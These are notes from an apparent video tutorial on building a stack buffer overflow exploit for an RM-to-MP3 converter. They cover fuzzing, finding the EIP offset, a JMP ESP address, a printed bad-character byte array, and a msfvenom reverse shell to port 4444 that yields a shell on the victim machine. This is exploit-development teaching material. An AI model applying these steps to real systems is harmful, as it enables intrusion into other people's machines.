Notes of the Demonstration Today i will give you a demonstration of rm2mp3 convertor stack overflow exploit development Before start with this tutorials it is better to understand that How the functions works in memory Excellent metirals available at : https://www.slideshare.net/saumilshah/how-functions-work-7776073 Once you are finish with it.. It is require to install imunity debugger in windows machine Let's install the immunity debugger as well as vulnerable rm2mp3 convertor So we are good to go now, Let's create the sample file to convert So let's load the file and see what happen So file is not loading due to invalid content, but the program running sucuessful Now let' increment the buffer of input Again program running successfully, Now let's double the buffer Note: To identify crash, there is technique called fuzzing So the program crashes, Let's see what happen in immunity debugger As We have write the "AAAA" in buffer it will overwrite the value in EIP register Stack representation is Array Buffer AAAA AAAA AAAA AAAA ---- OLD EBP ---- EIP ---- Paramenter of the function So when we put large array, it will overwrite the value in EIP with AAAA which represent to 41414141 Now let's identify the offset, at which the EIP is overwrite Identify the offset using Create random unique string metasploit-framework/tools/exploit/pattern_create.rb Copy th eip value and find the offset using metasploit-framework/tools/exploit/pattern_offset.rb Let me power up my kali machine So the EIP contains 48366C48 Let's search this offset in generated pattern using pattern_offset.rb It's give 5808, which is wrong offset as we know that till 15000 character the program is not crashed so lets verify it using python module, or we can simply give the length parameter It's possible that our program got crashed after 26088 buffer length, Let's verify it So it has accepted the buffer length, Now let's put 4 B to verify that EIP contains 42424242 (ASCII representation of B) As we can see EIP Contains 42424242, that means application crash after 26088 length Now let's understand the structure -------- AAAA AAAA AAAA .... ---- AAAA ------- BBBB ---- So when function return then it's pop the EIP and ESP points to the below the EIP now at the time of crashes So to execute the shell code, we have to find a JMP ESP instruction address that we put in EIP So when ever EIP popup, it will execute the Instruction JMP ESP and it will start the execute from where the ESP is pointing And then we put our shellcode their Let's do the practical for that Address is 75E50F37 \xCC is INT3 instruction to check whether the JMP ESP working or not As we can see that my INT3 instrauction is executed now let's create the shell code To create the shellcode first we have to identify the badcharacter badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") List of badcharacter are '\x00\x09\x0a at 09 also the buffer is break so \x09 also a bad character at 0a also the buffer is break so \x0a also a bad character So now the buffer is not break so we are good to go for generate the shellcode without badcharacter To do so we can use metasploit msfvenom utility LHOST is attachers IP address, in our case it's ubunut's ip and port is 4444 So this is how we got the shell of the victim machine Thank you so much for watching this vedio!!!!